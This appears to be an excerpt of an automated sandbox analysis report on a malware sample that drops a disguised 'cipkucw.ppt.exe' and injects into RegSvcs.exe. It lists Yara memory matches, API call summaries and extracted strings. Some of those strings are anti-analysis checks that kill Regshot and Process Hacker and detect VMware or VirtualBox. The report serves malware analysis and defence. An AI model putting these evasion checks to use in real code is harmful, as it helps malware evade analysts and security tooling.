          Source: Yara matchFile source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2800, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
          Source: cipkucw.ppt.exe, 0000000F.00000003.2022211718.00000000015FA000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021396423.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021523014.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021288890.000000000158F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000158B000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2023014076.00000000015FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
          Source: cipkucw.ppt.exe, 00000011.00000003.2165739179.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2166399836.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000002.2168766408.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165802750.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167635107.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165513335.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEQ
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES;
          Source: cipkucw.ppt, 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: cipkucw.ppt, 00000006.00000003.1898895696.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894741110.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1900546732.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1791493766.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895278716.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1900659369.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894814022.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2022870564.0000000001565000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947893692.0000000001534000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021946985.0000000001564000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947955595.0000000001544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000007508000.00000004.00000020.00020000.00000000.sdmp, xdgrnj.pdf.6.dr, xdgrnj.pdf.0.drBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
          Source: cipkucw.ppt.exe, 0000000F.00000003.2022211718.00000000015FA000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021396423.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021523014.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021288890.000000000158F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000158B000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2023014076.00000000015FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES)0E
          Source: cipkucw.ppt.exe, 0000000F.00000003.2022211718.00000000015FA000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021396423.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021523014.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021288890.000000000158F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000158B000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2023014076.00000000015FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE;7W
          Source: cipkucw.ppt.exe, 00000011.00000003.2165739179.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2166399836.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000002.2168766408.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165802750.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167635107.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165513335.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
          Source: cipkucw.ppt.exe, 00000011.00000003.2161007589.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160782741.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165609546.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167250522.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160662377.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE"){
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021347301.0000000001567000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947893692.0000000001534000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947955595.0000000001544000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2022886035.0000000001568000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000154F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENS
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000007508000.00000004.00000020.00020000.00000000.sdmp, xdgrnj.pdf.6.dr, xdgrnj.pdf.0.drBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
          Source: cipkucw.ppt.exe, 00000013.00000003.2240621163.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240877457.0000000001704000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2242293917.0000000001706000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000002.2243302839.0000000001708000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240734384.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240806388.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE#PTV
          Source: cipkucw.ppt.exe, 00000013.00000003.2240621163.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240877457.0000000001704000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2242293917.0000000001706000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000002.2243302839.0000000001708000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240734384.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240806388.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES1QFU
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEQ
          Source: cipkucw.ppt.exe, 0000000F.00000002.2022870564.0000000001565000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947893692.0000000001534000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021946985.0000000001564000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947955595.0000000001544000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000154F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167687728.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167393011.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2161007589.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000002.2168529996.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160782741.0000000000B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
          Source: cipkucw.ppt.exe, 00000011.00000003.2165739179.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2166399836.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000002.2168766408.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165802750.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167635107.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165513335.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE2
          Source: cipkucw.ppt.exe, 00000011.00000002.2168460172.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160662377.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165468576.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000002.2243058111.0000000001662000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2169741176.0000000001654000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.000000000165D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240621163.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240877457.0000000001704000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2242293917.0000000001706000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000002.2243302839.0000000001708000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240734384.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
          Source: cipkucw.ppt, 00000006.00000003.1898895696.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894741110.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1900546732.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1791493766.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895278716.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894814022.0000000000DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")Z(
          Source: cipkucw.ppt, 00000006.00000003.1894814022.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894993535.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1791493766.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000002.1901823568.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1900659369.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENI
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, xdgrnj.pdf.6.dr, xdgrnj.pdf.0.drBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: threadDelayed 3409
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: threadDelayed 6399
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt API coverage: 5.6 %
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe API coverage: 5.2 %
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe TID: 3428 Thread sleep count: 68 > 30
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe TID: 3428 Thread sleep count: 173 > 30
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe TID: 3428 Thread sleep count: 127 > 30
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0027F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0027F826
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00291630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00291630
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_0075E387
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0075D836
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0075DB69
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00769F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00769F9F
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0076A0FA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_0076A488
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007665F1 FindFirstFileW,FindNextFileW,FindClose,6_2_007665F1
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00767248 FindFirstFileW,FindClose,6_2_00767248
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007672E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_007672E9
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_0102E387
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0102D836
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0102DB69
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01039F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_01039F9F
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0103A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0103A0FA
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_010365F1 FindFirstFileW,FindNextFileW,FindClose,15_2_010365F1
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0103A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_0103A488
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01037248 FindFirstFileW,FindClose,15_2_01037248
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_010372E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_010372E9
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00294E14 VirtualQuery,GetSystemInfo,0_2_00294E14
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000154F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
          Source: cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
          Source: cipkucw.ppt.exe, 00000011.00000003.2165570776.0000000000B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
          Source: cipkucw.ppt.exe, 00000013.00000003.2240251372.000000000165D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rocessExists("VboxService.exe") Then
          Source: cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe
          Source: cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2241625199.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2241646838.00000000016B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exea?
          Source: xdgrnj.pdf.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
          Source: cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenp,
          Source: cipkucw.ppt, 00000006.00000003.1898912127.0000000000DF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeh
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021784883.00000000015A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exeZ{l
          Source: xdgrnj.pdf.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
          Source: RegSvcs.exe, 0000000C.00000002.4091230797.000000000188B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000154F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then7ya
          Source: cipkucw.ppt.exe, 00000013.00000003.2240251372.000000000165D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
          Source: cipkucw.ppt.exe, 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware
          Source: cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
          Source: xdgrnj.pdf.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
          Source: cipkucw.ppt.exe, 00000011.00000003.2166743027.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165570776.0000000000B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exej
          Source: cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenA,
          Source: cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe3A765687
